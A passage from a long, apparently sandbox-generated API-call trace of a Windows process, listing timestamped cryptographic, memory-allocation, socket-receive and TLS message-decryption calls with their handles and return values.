| out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.837] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.838] malloc (_Size=0x1fd) returned 0x3df0420 [0142.838] free (_Block=0x0) [0142.838] free (_Block=0x3def558) [0142.838] malloc (_Size=0x1fd) returned 0x3def558 [0142.838] free (_Block=0x0) [0142.838] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.838] CryptHashData (hHash=0x432db8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.838] malloc (_Size=0x14) returned 0x3f654e0 [0142.838] free (_Block=0x0) [0142.838] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f654e0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f654e0, pdwDataLen=0x37dfacc) returned 1 [0142.838] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.838] free (_Block=0x3f654e0) [0142.838] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.838] free (_Block=0x3def558) [0142.838] free (_Block=0x3def350) [0142.838] malloc (_Size=0x1fd) returned 0x3def350 [0142.839] free (_Block=0x0) [0142.839] malloc (_Size=0x1c4) returned 0x3d81f20 [0142.839] free (_Block=0x0) [0142.839] malloc (_Size=0x1c4) returned 0x3def558 [0142.839] free (_Block=0x0) [0142.839] free (_Block=0x0) [0142.839] free (_Block=0x3d81f20) [0142.839] free (_Block=0x3def558) [0142.839] free (_Block=0x3def350) [0142.839] free (_Block=0x3df0420) [0142.839] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0142.839] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0142.983] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0142.983] malloc (_Size=0x1fd) returned 0x3df0420 [0142.983] free (_Block=0x0) [0142.983] malloc (_Size=0x1fd) returned 0x3def350 [0142.983] free (_Block=0x0) [0142.983] free (_Block=0x0) [0142.983] free (_Block=0x3df0420) [0142.984] malloc (_Size=0x1fd) returned 0x3df0420 [0142.984] free (_Block=0x0) [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.984] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.985] malloc (_Size=0x1fd) returned 0x3def558 [0142.985] free (_Block=0x0) [0142.986] free (_Block=0x3def350) [0142.986] free (_Block=0x3df0420) [0142.986] malloc (_Size=0x1fd) returned 0x3def350 [0142.986] free (_Block=0x0) [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.987] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.988] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.989] malloc (_Size=0x1fd) returned 0x3df0420 [0142.989] free (_Block=0x0) [0142.989] free (_Block=0x3def558) [0142.989] malloc (_Size=0x1fd) returned 0x3def558 [0142.989] free (_Block=0x0) [0142.989] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.989] CryptHashData (hHash=0x432db8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.989] malloc (_Size=0x14) returned 0x3f651e0 [0142.989] free (_Block=0x0) [0142.989] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfacc) returned 1 [0142.989] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.989] free (_Block=0x3f651e0) [0142.989] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.989] free (_Block=0x3def558) [0142.989] free (_Block=0x3def350) [0142.989] malloc (_Size=0x1fd) returned 0x3def350 [0143.004] free (_Block=0x0) [0143.004] malloc (_Size=0x1) returned 0x3f4c0b8 [0143.005] free (_Block=0x0) [0143.005] malloc (_Size=0x1) returned 0x3f4c038 [0143.005] free (_Block=0x0) [0143.005] free (_Block=0x0) [0143.005] free (_Block=0x3f4c0b8) [0143.005] SetEvent (hEvent=0x5d0) returned 1 [0143.005] SetEvent (hEvent=0x5d4) returned 1 [0143.005] free (_Block=0x3f4c038) [0143.005] free (_Block=0x3def350) [0143.005] free (_Block=0x3df0420) [0143.005] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0143.005] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0143.602] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0143.602] malloc (_Size=0x1fd) returned 0x3df0420 [0143.602] free (_Block=0x0) [0143.602] malloc (_Size=0x1fd) returned 0x3d81e60 [0143.602] free (_Block=0x0) [0143.603] free (_Block=0x0) [0143.603] free (_Block=0x3df0420) [0143.603] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x432cb8) returned 1 [0143.609] CryptExportKey (in: hKey=0x432cb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0143.609] CryptExportKey (in: hKey=0x432cb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0143.609] malloc (_Size=0x80) returned 0x609b60 [0143.609] free (_Block=0x0) [0143.609] CryptDestroyKey (hKey=0x432cb8) returned 1 [0143.609] malloc (_Size=0x64) returned 0x60b310 [0143.609] free (_Block=0x0) [0143.609] malloc (_Size=0x80) returned 0x6097a8 [0143.609] free (_Block=0x0) [0143.609] malloc (_Size=0xc0) returned 0x3594d18 [0143.609] free (_Block=0x6097a8) [0143.609] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0143.610] CryptHashData (hHash=0x4329f8, pbData=0x3594d18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0143.610] malloc (_Size=0x14) returned 0x3f653e0 [0143.610] free (_Block=0x0) [0143.610] CryptGetHashParam (in: hHash=0x4329f8, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x37dfa34) returned 1 [0143.610] CryptDestroyHash (hHash=0x4329f8) returned 1 [0143.610] free (_Block=0x3f653e0) [0143.610] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, 